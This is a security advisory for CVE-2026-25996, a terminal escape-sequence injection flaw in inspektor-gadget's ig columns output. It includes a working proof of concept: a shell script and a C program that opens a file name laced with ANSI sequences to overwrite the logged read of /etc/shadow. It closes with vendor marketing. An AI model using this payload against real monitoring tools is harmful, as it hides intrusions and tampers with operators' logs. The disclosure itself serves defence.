CVE-2026-25996

CVE-2026-25996 is a medium-severity security vulnerability in github.com/inspektor-gadget/inspektor-gadget (go), affecting versions < 0.49.1. It is fixed in 0.49.1.

Summary

Description

String fields from eBPF events in columns output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences.

Therefore, a maliciously forged – partially or completely, event payload, coming from an observed container, might inject the escape sequences into the terminal of ig operators, with various effects.

The columns output mode is the default when running ig run interactively.

PoC

Attachments

run.sh


#!/bin/bash
set -e

SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
CONTAINER_NAME="poc-escape-inject"

echo "Make sure ig is running in another terminal:"
echo "  sudo ig run trace_open -c ${CONTAINER_NAME}"
echo ""
echo "Press Enter to continue..."
read -r

sudo docker run --rm \
    --name "${CONTAINER_NAME}" \
    -v "${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro" \
    gcc:latest \
    bash -c "
        gcc -o /tmp/escape_inject /src/escape_inject.c && \
        /tmp/escape_inject
    "

escape_inject.c

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

static void read_file(const char *path)
{
	int fd = open(path, O_RDONLY);
	if (fd >= 0)
		close(fd);
}

static void create_file(const char *path)
{
	int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
	if (fd >= 0)
		close(fd);
}

int main(void)
{
	printf("[1] normal activity\n");
	create_file("/tmp/app.log");
	printf("[2] malicious read of /etc/shadow\n");
	read_file("/etc/shadow");
	usleep(300000);
	printf("[3] tampering the log\n");
	create_file("/etc\x1b[1A/bashrc\x1b[1B\x1b[13C");
	usleep(300000);
	return 0;
}
  1. Setup a Linux host and build/install ig version 0.48.0
  2. Run the attached run.sh on a terminal
  3. Run sudo ig run trace_open -c poc-escape-inject on another terminal
  4. Press "Enter" on the terminal attached to run.sh
  5. Observe the events traced by ig
  6. Notice that, at some point, the line where /etc/shadow is logged is overwritten /etc/bashrc, demonstrating the log injection

Resources

Notes

The json output mode was already sanitizing the content.

Impact

The impact depends on the injection point, mostly due to length limitations, and on the terminal used by the operator when running displaying columns output.

At the very least, the injection can be used for Log Injection, by inserting new lines or deleting existing ones.

However, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:

  • lead to DoS (Denial of Service)
  • write to the system clipboard
  • create hyperlinks to attacker-controlled servers
  • change window title
  • potentially execute code (see referenced resources)

Affected versions

github.com/inspektor-gadget/inspektor-gadget (< 0.49.1)

Security releases

github.com/inspektor-gadget/inspektor-gadget → 0.49.1 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/inspektor-gadget/inspektor-gadget to 0.49.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-25996? CVE-2026-25996 is a medium-severity security vulnerability in github.com/inspektor-gadget/inspektor-gadget (go), affecting versions < 0.49.1. It is fixed in 0.49.1.
  2. Which versions of github.com/inspektor-gadget/inspektor-gadget are affected by CVE-2026-25996? github.com/inspektor-gadget/inspektor-gadget (go) versions < 0.49.1 is affected.
  3. Is there a fix for CVE-2026-25996? Yes. CVE-2026-25996 is fixed in 0.49.1. Upgrade to this version or later.
  4. Is CVE-2026-25996 exploitable, and should I be worried? Whether CVE-2026-25996 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-25996 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-25996? Upgrade github.com/inspektor-gadget/inspektor-gadget to 0.49.1 or later.

Other vulnerabilities in github.com/inspektor-gadget/inspektor-gadget

Other vulnerabilities in github.com/inspektor-gadget/inspektor-gadget

Stop the waste.
Protect your environment with Kodem.